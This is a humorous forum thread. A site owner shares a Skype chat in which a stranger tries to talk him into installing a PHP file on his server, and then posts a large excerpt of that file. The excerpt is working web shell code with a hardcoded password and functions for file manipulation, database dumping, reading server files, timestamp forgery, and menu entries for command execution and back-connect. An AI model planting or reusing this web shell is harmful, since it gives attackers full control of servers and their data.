Our New Administrator

[rbcp]

Some guy added me on Skype today and began trying to call me for an hour straight.  After telling him I couldn't pick up, I'm not sure what happened, but I'm pretty sure our forums have a new admin.  Welcome to the team, Bilgiislen!

Brad Carter 2:34 PM sorry, i can't pick up right now

BİLGİİSLEM KEMAL 2:35 PM facebook fan pages are the web site have liked it very much would like to give you support

Brad Carter 2:35 PM thanks

BİLGİİSLEM KEMAL 2:36 PM We know web design your page I want to be my manager
I want to be my page, the administrator have knowledge of web design

Brad Carter 2:37 PM i don't understand anything you're saying

BİLGİİSLEM KEMAL 2:38 PM http://www.phonelosers.com/index.php
you web site ?

Brad Carter 2:39 PM yes

BİLGİİSLEM KEMAL 2:39 PM I want to be the website administrator

Brad Carter 2:40 PM why?

BİLGİİSLEM KEMAL 2:40 PM I am interested in my page to bring the fans on Facebook members multiplies

Brad Carter 2:42 PM Thank you, but we've already got people running that web site

BİLGİİSLEM KEMAL 2:43 PM I want to be with you

Brad Carter 2:43 PM I don't swing that way, baby

BİLGİİSLEM KEMAL 2:43 PM Would you make something for me well
In a tiny thing


Brad Carter 2:48 PM  I don't know what you're asking

BİLGİİSLEM KEMAL 2:49 PM Do you have a server that installs a small php file

Brad Carter 2:50 PM Why yes I do!

BİLGİİSLEM KEMAL is sending you a file 2:50 PM footer.php

BİLGİİSLEM KEMAL 2:50 PM  this file
can change the name of the
Once installed, you give the url address

Brad Carter 2:52 PM This seems like the worst idea ever.

BİLGİİSLEM KEMAL 2:52 PM No, but you certainly could swear
I just want you to do so after 1 hour my server does not delete

Brad Carter 2:53 PM Monkeys kidnapped my grandparents and I have to wait at the pay phone at 5:00

BİLGİİSLEM KEMAL 2:54 PM
Would you please be so kind you can throw and then delete the file again, I get it now
and I'll do you as a gift to send to facebook fan page

Brad Carter 2:55 PM Watch me eat 450 hardboiled eggs.

BİLGİİSLEM KEMAL 2:55 PM I want something smallish

Brad Carter 2:55 PM Are you for panda rape?

BİLGİİSLEM KEMAL 2:56 PM No rape trial just do not care that my server does not

Brad Carter 2:56 PM What do you say we make apple juice and fax it to each other?

BİLGİİSLEM KEMAL 2:57 PM

Brad Carter 2:57 PM  I have a sheep doing roofing over at my house.  Why don't you drop in?  We'll put on Zepplin and eat cheddar cheese.

BİLGİİSLEM KEMAL 2:57 PM of mine you're kidding

Brad Carter 2:57 PM  Jesus is a raisen.

BİLGİİSLEM KEMAL 2:59 PM Could you upload the file?

Brad Carter 2:59 PM  I already did

BİLGİİSLEM KEMAL 3:00 PM  What is the address

Brad Carter 3:00 PM  1313 Mockingbird Lane, Los Angeles, CA 90210

BİLGİİSLEM KEMAL 3:00 PM  no
file adresss

Brad Carter 3:01 PM What should I file the address under?
I have a manilla folder.
And a label maker.

BİLGİİSLEM KEMAL 3:02 PM  I understand
http://www.phonelosers.com/.... ?
I gave the file which is installed in the folder

Brad Carter 3:02 PM  I am copying the PHP code by hand on college ruled paper
I'm almost finished with it

BİLGİİSLEM KEMAL 3:03 PM Did you install the file server

Brad Carter 3:06 PM  yes
what files are we going to server?
i will have a joyous time serving files

BİLGİİSLEM KEMAL 3:07 PM You can make it if we were loaded url

Brad Carter 3:07 PM  I am loading the URL as we speak
My pen is out of ink

BİLGİİSLEM KEMAL 3:07 PM  No kidding
You can make the file path

[DBK]

Be careful, he might be trying to trick you.

[nyphonejacks]

I am not too sure about panda rape, Sexual Harassment Panda says
"The first party of the first panda may sue the second-party panda unless that panda was said panda aforementioned panda"

<a href="http://www.youtube.com/v/bN1xLgSlGpI&rel=1" target="_blank">http://www.youtube.com/v/bN1xLgSlGpI&rel=1</a>

[markov]

wow... that's a pretty amazing conversation

[Godot]

I want to see that PHP file he sent you...

[rbcp]

I want to see that PHP file he sent you...

Here's part of it.  It was 2,000 lines of code and it's too big to post here. 
This is about 1/4th of it though.  I just skimmed over it so I don't really
know what it does, but there's lots of file writing and directory creating.

Code: [Select]

/*****************************************************************************

===================== ÇëÎóÓÃÓÚ·Ç·¨ÓÃ;£¬Ôì³ÉÒ»Çкó¹ûÓë±¾ÈËÎŞ¹Ø¡£====================

·¢²¼´Ë°æ±¾ÊÇΪÁ˼ÍÄȫÌìʹÔø¾­µÄ»Ô»Í¡£

¸ĞĞ»ÄãÃÇÓëÎÒһͬ×ß¹ı£ºSniper\Super¡¤Hei\kEvin1986\saiy\wofeiwo¡£

¸ĞĞ»ËùÓеÄÅóÓÑÃÇ¡¢ĞÖµÜÃÇ¡£¶àĞ»ÄãÃǵĹØĞĺÍÖ§³Ö£¡

Ñ¡ÔñÔÚ1ÔÂ7ÈÕ·¢²¼ÊÇΪÁ˼ÍÄîÎÒÀÏÆŵÄÉúÈÕ£¬Ô¤×£ÎÒÔÚ±¾ÃüÄêÀï¡£ÏÌÓã·­Éí£¡

====================== ×îºóԤף°²È«ÌìʹµÄÿһλÅóÓÑ·É»ÆÌÚ´ï =======================

Codz by kodk3r(Muro)

Make in China

Web: http://www.TeknoWBH.Com

*****************************************************************************/

error_reporting(7);
@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
define('IS_GPC', get_magic_quotes_gpc());
$dis_func = get_cfg_var('disable_functions');
define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
@set_time_limit(0);

foreach(array('_GET','_POST') as $_request) {
foreach($$_request as $_key => $_value) {
if ($_key{0} != '_') {
if (IS_GPC) {
$_value = s_array($_value);
}
$$_key = $_value;
}
}
}

/*===================== ³ÌĞòÅäÖà =====================*/
$admin = array();
// ÊÇ·ñĞèÒªÃÜÂëÑéÖ¤, true ΪĞèÒªÑéÖ¤, false Ϊֱ½Ó½øÈë.ÏÂÃæÑ¡ÏîÔòÎŞĞ§
$admin['check'] = true;
// Èç¹ûĞèÒªÃÜÂëÑéÖ¤,ÇëĞŞ¸ÄµÇ½ÃÜÂë
$admin['pass']  = 'muro1';

//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓĞÌØÊâÒªÇó, »òµÇ¼²»Õı³£, ÇëĞŞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
// cookie ǰ׺
$admin['cookiepre'] = '';
// cookie ×÷ÓÃÓò
$admin['cookiedomain'] = '';
// cookie ×÷Ó÷¾¶
$admin['cookiepath'] = '/';
// cookie ÓĞЧÆÚ
$admin['cookielife'] = 86400;
/*===================== ÅäÖýáÊø =====================*/

if ($charset == 'utf8') {
header("content-Type: text/html; charset=utf-8");
} elseif ($charset == 'big5') {
header("content-Type: text/html; charset=big5");
} elseif ($charset == 'gbk') {
header("content-Type: text/html; charset=gbk");
} elseif ($charset == 'latin1') {
header("content-Type: text/html; charset=iso-8859-2");
}

$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();

/*===================== Éí·İÑéÖ¤ =====================*/
if ($action == "logout") {
scookie('phpspypass', '', -86400 * 365);
p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
exit;
}
if($admin['check']) {
if ($doing == 'login') {
if ($admin['pass'] == $password) {
scookie('phpspypass', $password);
p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
exit;
}
}
if ($_COOKIE['phpspypass']) {
if ($_COOKIE['phpspypass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== ÑéÖ¤½áÊø =====================*/

$errmsg = '';

// ²é¿´PHPINFO
if ($action == 'phpinfo') {
if (IS_PHPINFO) {
phpinfo();
} else {
$errmsg = 'phpinfo() function has non-permissible';
}
}

// ÏÂÔØÎļş
if ($doing == 'downfile' && $thefile) {
if (!@file_exists($thefile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
$fileinfo = pathinfo($thefile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header('Content-Length: '.filesize($thefile));
@readfile($thefile);
exit;
}
}

// Ö±½ÓÏÂÔر¸·İÊı¾İ¿â
if ($doing == 'backupmysql' && !$saveasfile) {
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
$table = array_flip($table);
$result = q("SHOW tables");
if (!$result) p('<h2>'.mysql_error().'</h2>');
$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata .= sqldumptable($currow[0]);
}
}
mysql_close();
exit;
}

// ͨ¹ıMYSQLÏÂÔØÎļş
if($doing=='mysqldown'){
if (!$dbname) {
$errmsg = 'Please input dbname';
} else {
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
if (!file_exists($mysqldlfile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
$result = q("select load_file('$mysqldlfile');");
if(!$result){
q("DROP TABLE IF EXISTS tmp_kodk3rMuro;");
q("CREATE TABLE tmp_kodk3rMuro (content LONGBLOB NOT NULL);");
//ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__kodk3rMuro_1111111111_eof__µÄÎļşÊ±²»ÍêÕûµÄÇé¿ö
q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_kodk3rMuro FIELDS TERMINATED BY '__kodk3rMuro_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__kodk3rMuro_{$timestamp}_eof__';");
$result = q("select content from tmp_kodk3rMuro");
q("DROP TABLE tmp_kodk3rMuro");
}
$row = @mysql_fetch_array($result);
if (!$row) {
$errmsg = 'Load file failed '.mysql_error();
} else {
$fileinfo = pathinfo($mysqldlfile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header("Accept-Length: ".strlen($row[0]));
echo $row[0];
exit;
}
}
}
}

?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
<title><?php echo str_replace('.','','#K.o.d.k.3.r. P.H.P. W.e.b. S.h.e.l.l. J.u.st. f.o.r. f.u.n  B.y #.C.y.b.e.r.H.a.c.k.e.r.s:) ');?></title>
<style type="text/css">
body,td{font: 12px Arial,Tahoma;line-height: 16px;}
.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
.bt {border-color:#b0b0b0;background:#33CCFF;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
a {color: #00f;text-decoration:underline;}
a:hover{color: #f00;text-decoration:none;}
.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
.head td span{font-weight:normal;}
form{margin:0;padding:0;}
h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#006666;}
ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
</style>
<script type="text/javascript">
function CheckAll(form) {
for(var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
    }
}
function $(id) {
return document.getElementById(id);
}
function goaction(act){
$('goaction').action.value=act;
$('goaction').submit();
}
</script>
</head>
<body style="margin:0;table-layout:fixed; word-break:break-all">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr class="head">
<td><span style="float:right;"><a href="http://www.TeknoWbh.Com" target="_blank"><?php echo str_replace('.','','#Root@Suikast.&#304;N');?> Version: 2010</a></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
</tr>
<tr class="alt1">
<td><span style="float:right;">Guvenli Mod:<?php echo getcfg('safe_mode');?></span>
<a href="javascript:goaction('logout');">CıkıS</a> |
<a href="javascript:goaction('file');">Dosya Yoneticisi</a> |
<a href="javascript:goaction('sqladmin');">MySQL Yoneticisi</a> |
<a href="javascript:goaction('sqlfile');">MySQL Yukle &amp; INDIR</a> |
<a href="javascript:goaction('shell');">Yurutme Komutu</a> |
<a href="javascript:goaction('phpenv');">PHP Degisken</a> |
<a href="javascript:goaction('eval');">Eval PHP Kod</a>
<?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Geri Baglayin!</a><?php }?>
</td>
</tr>
</table>
<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<?php

formhead(array('name'=>'goaction'));
makehide('action');
formfoot();

$errmsg && m($errmsg);

// »ñÈ¡µ±Ç°Â·¾¶
!$dir && $dir = '.';
$nowpath = getPath(SA_ROOT, $dir);
if (substr($dir, -1) != '/') {
$dir = $dir.'/';
}
$uedir = ue($dir);

if (!$action || $action == 'file') {

// Å&#286;¶Ï¶Á&#286;´Çé¿ö
$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';

// É¾³&#305;Ŀ¼
if ($doing == 'deldir' && $thefile) {
if (!file_exists($thefile)) {
m($thefile.' directory does not exist');
} else {
m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
}
}

// ´´½¨Ä¿Â¼
elseif ($newdirname) {
$mkdirs = $nowpath.$newdirname;
if (file_exists($mkdirs)) {
m('Directory has already existed');
} else {
m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
@chmod($mkdirs,0777);
}
}

// ÉÏ´«Îļ&#351;
elseif ($doupfile) {
m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
}

// ±à¼­Îļ&#351;
elseif ($editfilename && $filecontent) {
$fp = @fopen($editfilename,'w');
m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
@fclose($fp);
}

// ±à¼­Îļ&#351;Êô&#286;Ô
elseif ($pfile && $newperm) {
if (!file_exists($pfile)) {
m('The original file does not exist');
} else {
$newperm = base_convert($newperm,8,10);
m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
}
}

// ¸ÄÃû
elseif ($oldname && $newfilename) {
$nname = $nowpath.$newfilename;
if (file_exists($nname) || !file_exists($oldname)) {
m($nname.' has already existed or original file does not exist');
} else {
m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
}
}

// ¸´ÖÆÎļ&#351;
elseif ($sname && $tofile) {
if (file_exists($tofile) || !file_exists($sname)) {
m('The goal file has already existed or original file does not exist');
} else {
m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
}
}

// ¿Ë¡ʱ¼ä
elseif ($curfile && $tarfile) {
if (!@file_exists($curfile) || !@file_exists($tarfile)) {
m('The goal file has already existed or original file does not exist');
} else {
$time = @filemtime($tarfile);
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
}
}

// ×Ô¶¨Òåʱ¼ä
elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
if (!@file_exists($curfile)) {
m(basename($curfile).' does not exist');
} else {
$time = strtotime("$year-$month-$day $hour:$minute:$second");
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
}
}

// ´ò°üÏÂÔØ
elseif($doing == 'downrar') {
if ($dl) {
$dfiles='';
foreach ($dl as $filepath => $value) {
$dfiles.=$filepath.',';
}
$dfiles=substr($dfiles,0,strlen($dfiles)-1);
$dl=explode(',',$dfiles);
$zip=new PHPZip($dl);
$code=$zip->out;
header('Content-type: application/octet-stream');
header('Accept-Ranges: bytes');
header('Accept-Length: '.strlen($code));
header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
echo $code;
exit;
} else {
m('Please select file(s)');
}
}

// ÅúÁ¿É¾³&#305;Îļ&#351;
elseif($doing == 'delfiles') {
if ($dl) {
$dfiles='';
$succ = $fail = 0;
foreach ($dl as $filepath => $value) {
if (@unlink($filepath)) {
$succ++;
} else {
$fail++;
}
}
m('Deleted file have finished£¬choose '.count($dl).' success '.$succ.' fail '.$fail);
} else {
m('Please select file(s)');
}
}

//²Ù×÷Íê±Ï
formhead(array('name'=>'createdir'));
makehide('newdirname');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileperm'));
makehide('newperm');
makehide('pfile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'copyfile'));
makehide('sname');
makehide('tofile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'rename'));
makehide('oldname');
makehide('newfilename');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileopform'));
makehide('action');
makehide('opfile');
makehide('dir');
formfoot();

$free = @disk_free_space($nowpath);
!$free && $free = 0;
$all = @disk_total_space($nowpath);
!$all && $all = 0;
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);
p('<h2>Dosya Yoneticisi - Suan disk bos '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)</h2>');

?>
<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  <form action="" method="post" id="godir" name="godir">
  <tr>
    <td nowrap>Gecerlı Dizin (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
    <td nowrap><input class="bt" value="GO" type="submit"></td>
  </tr>
  </form>
</table>



[murd0c]

WTF, why didn't you install the file like he asked? Jerk!

[ApprenticePhreak]

Ask him if he charges a monthly fee for admining. I need an admin to solve my issues when my computer pops up with a blue screen, it always tells me to contact my computer's administrator and I'm not sure at all who that is!

[BxK]

You should upload the entire file.

[rbcp]

You should upload the entire file.

YOU'RE ONE OF THEM!

[Acidpez]

Make a fake site like phonewinnerz.org on a cheap host like hostbig.com  and put the PHP file on it and see what happens.

[Godot]

The PHP is just a script to give him full access to your website and databases. Looks like something a hacker would drop onto a site.

[markov]

The PHP is just a script to give him full access to your website and databases. Looks like something a hacker would drop onto a site.

LIES!!! You'll be hearing from BİLGİİSLEM KEMAL's lawyer regarding your slanderous post!!

[HeavyRittles]

You'd think having working knowledge of the mark's language would be the first step in SE...

[ApprenticePhreak]

You'd think having working knowledge of the mark's language would be the first step in SE...

Speaking the same language as the mark tends to help out quite a bit as well. If you can't convey your message clearly of what you want, you won't get it.